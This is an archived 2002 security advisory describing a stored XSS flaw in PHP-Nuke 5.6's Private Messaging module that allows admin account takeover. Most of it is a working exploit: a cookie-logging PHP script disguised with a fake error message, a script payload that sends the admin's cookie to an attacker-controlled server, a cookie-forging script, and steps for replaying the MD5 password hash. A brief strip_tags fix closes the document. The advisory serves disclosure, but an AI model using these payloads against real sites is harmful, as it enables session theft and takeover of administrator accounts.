TUCoPS :: Web :: PHP :: web5635.htm

PHP Nuke users can compromise admin accounts
16th Aug 2002 [SBWID-5635]
COMMAND

	PHP Nuke users can compromise admin accounts

SYSTEMS AFFECTED

	Tested on PHP-Nuke v5.6 with Mozilla on Linux

PROBLEM

	<-delusion-> [http://digital-delusions.dyn.ee] says :
	

	Due to a XSS flaw in PHPNuke's Private Messaging module, users can  send
	messages with html code that will be executed without any filtering.  In
	old  PHPNuke  versions  XSS  allowed  theft  of  cookies  which   stored
	passwords in base64 encoding. Well  PHPNuke  version  5.6  encrypts  the
	passwds in md5 before it encodes it into  base64  and  puts  it  into  a
	cookie. This made stolen cookies useless  if  the  attacker  just  tried
	decoding the  base64  encrypted  pass,  because  he  just  got  the  MD5
	encrypted pass.
	

	Since PHP Nuke encrypts passes in md5 and  then  matches  the  encrypted
	pass with the encrypted one in the database, i was able to use  the  md5
	encrypted pass i got from the stolen cookie to authenticate myself.
	

	PHPNuke sets cookies by base64 encoding a string that looks like this:
	

	username:md5_encrypted_pass:lang

	

	Since i can get the md5_encrypted pass all i have  to  do  is  launch  a
	script that base64 encodes a string like the one above, and sets  it  as
	a cookie on my box.
	

	 Exploit:

	 --------

	

	For this exploit to work, you must create the following  files  in  your
	web server's directory.
	

	cookie.php containing this:
	

	<?

	$fp = fopen("cookie.txt","a");

	fputs($fp, $cookie);

	fclose($fp);

	print "Message Not Found!"; /* this is so the admin doesnt get scared. and

	thinks its some bug. */

	?>

	

	test.php containing:
	

	<?

	$admin = base64_encode("decoded_string") ;

	setcookie("admin","$admin",time()+2592000);

	?>

	

	You will find out what to replace decoded_string with..
	

	1. Send an appealing private message to admin containing
	

	<script>document.location.replace('http://yourserver/cookie.php?cookie='+doc

	ument.cookie);</script>

	

	2. Wait awhile until the admin checks the message then check  cookie.txt
	on yer server.
	

	3. From cookie.txt.. copy the encrypted text  after  admin=  and  before
	the ;
	

	4. go to http://www.isecurelabs.com/base64.php paste  the  copied  text,
	click   decode   it   should   give    u    a    string    like    this:
	username:md5_encrypted_passwd:language (language may be blank).
	

	5. paste the decoded string into test.php like so.
	

	<?

	$admin = base64_encode("paste decoded string here");

	setcookie("admin","$admin",time()+2592000);

	?>

	

	6. Login as any user on the site
	

	7. send private message to self containing:
	

	<iframe src="http://yerserver/test.php"></iframe>

	

	Open the message and a cookie will now be set on yer box,  but  it  will
	be configured with your server's URL. So all u gotta do is  replace  yer
	url wit the nuked site.
	

	8.      for      mozilla       edit       cookies.txt       in       yer
	~/.mozilla/someprofile/something/  directory  replace  the  url  of  yer
	server to the nuked site, for other browsers just find the  Cookie  from
	your server and edit it so instead of showng your url it shows  the  url
	of the nuked site.
	

	9. restart yer browser (close and open  up  again).  go  back  into  the
	nuked site and you are now admin. :D

SOLUTION

	 Temp Solution:

	 --------------

	

	Edit  reply.php  in  /modules/Private_Messages/  and  make  $message  be
	stripped of html tags.
	

	Go to line 75 in reply.php and add this line:
	

	$message = strip_tags($message, '<br><b><u><i>');

	

	That will  remove  any  html  tags  that  arent  <br><b><u>  or
	<i>. So it will prevent the XSS.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH